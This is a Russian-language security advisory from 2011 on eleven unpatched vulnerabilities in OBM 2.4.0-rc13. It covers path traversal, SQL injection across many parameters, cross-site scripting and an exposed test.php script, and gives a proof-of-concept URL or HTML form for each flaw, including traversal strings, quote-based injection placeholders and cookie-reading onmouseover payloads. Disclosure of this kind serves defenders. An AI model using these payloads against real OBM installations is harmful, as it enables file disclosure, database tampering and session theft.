Security Lab

Множественные уязвимости в OBM

Дата публикации:22.12.2011
Всего просмотров:1755
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:11
CVSSv2 рейтинг: 6.8 (AV:N/AC:L/Au:S/C:C/I:N/A:N/E:P/RL:U/RC:C)
6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:U/RC:C)
6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:U/RC:C)
6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N/E:P/RL:U/RC:C)
5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:P/RL:U/RC:C)
5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:P/RL:U/RC:C)
5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N/E:P/RL:U/RC:C)
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:P/RL:U/RC:C)
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:P/RL:U/RC:C)
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:P/RL:U/RC:C)
5 (AV:N/AC:L/Au:N/C:P/I:N/A:N/E:P/RL:U/RC:C)
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: OBM 2.4.x
Уязвимые версии: OBM 2.4.0-rc13, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "module" в сценарии exportcsv/exportcsv_index.php. Удаленный пользователь может с помощью специально сформированного запроса, содержащего символы обхода каталога, просмотреть содержимое произвольных файлов на системе. Пример:

http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "sel_domain_id" в сценарии obm.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

<form action="http://[host]/obm.php" method="post">
<input type="hidden" name="login" value="">
<input type="hidden" name="password" value="">
<input type="hidden" name="sel_domain_id" value="' SQL_CODE_HERE">
<input type="submit" value="submit" id="btn"> 
</form>

Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен.

3. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "lang" и "theme" в сценарии settings/settings_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/settings/settings_index.php?lang=%27%20SQL_CODE_HERE
http://obm/settings/settings_index.php?theme=%27%20SQL_CODE_HERE

Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен.

4. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tf_user" в сценарии group/group_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/group/group_index.php?action=search&popup=&sel_privacy=_ALL_&submit=Find&a mp;tf_user=%27%20SQL_CODE_HERE

Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен.

5. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "tf_delegation", "tf_ip" и "tf_name" в сценарии host/host_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=%27%20SQL_CODE_HERE&tf_ip=&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=%27%20SQL_CODE_HERE&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=&tf_name=%27%20SQL_CODE_HERE

Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен.

6. Уязвимость существует из-за недостаточной обработки входных данных в параметре "action" в сценарии obm.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/obm.php?action=%27%20SQL_CODE_HERE

Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен.

7. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "cal_alert", "cal_first_hour", "cal_interval", "cal_last_hour", "commentorder", "csv_sep", "date", "date_upd", "debug_exe", "debug_id", "debug_param", "debug_sess", "debug_solr", "debug_sql", "dsrc", "menu", "rows", "sel_display_days", "timeformat", "timezone" и "todo" в сценарии settings/settings_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/settings/settings_index.php?cal_alert=%27%20SQL_CODE_HERE&cal_first_hour=0&cal _interval=4&cal_last_hour=1&commentorder=0&csv_sep=%3b&date=Y-m-d&date_upd=Y-m-d &debug_exe=16&debug_id=1&debug_param=2&debug_sess=4&debug_solr=32&debug_sql= 8&display=yes&dsrc=0&form_user_pref=1&mail=yes&mail_participation=yes&menu=t ext&public_fb=yes&rows=10&sel_display_days=1111111&submit=Validate&timeformat=12 H&timezone=Africa%2fAbidjan&todo=todo_priority

Для успешной эксплуатации уязвимости необходимо, чтобы параметр "magic_quotes_gpc" был отключен.

8. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "tf_delegation", "tf_ip" и "tf_name" в сценарии host/host_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=%22%20onmouseover=alert%28document.cookie%29;%22&tf_ip=&tf _name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=%22%20onmouseover=alert%28document.cookie%29;%22&tf _name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_fronte nd=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=& amp;submit=Find&tf_delegation=&tf_ip=&tf_name=%22%20onmouseover=alert%28document.cookie% 29;%22

9. Уязвимость существует из-за недостаточной обработки входных данных в параметре "login" в сценарии obm.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

<form action="http://[host]/obm.php" method="post">
<input type="hidden" name="login" value='" onmouseover=alert(document.cookie) "'>
<input type="hidden" name="password" value="">
<input type="hidden" name="sel_domain_id" value="">
<input type="submit" value="submit" id="btn"> 
</form>

10. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tf_user" в сценарии group/group_index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/group/group_index.php?action=search&popup=&sel_privacy=_ALL_&submit=Find&a mp;tf_user=%22%20onmouseover=alert%28document.cookie%29;%22

11. Уязвимость существует из-за небезопасного сохранения сценария test.php. Удаленный пользователь может получить доступ к важной информации вызывая файл напрямую. Пример:

http://[host]/test.php

URL производителя: http://obm.org/doku.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_obm.html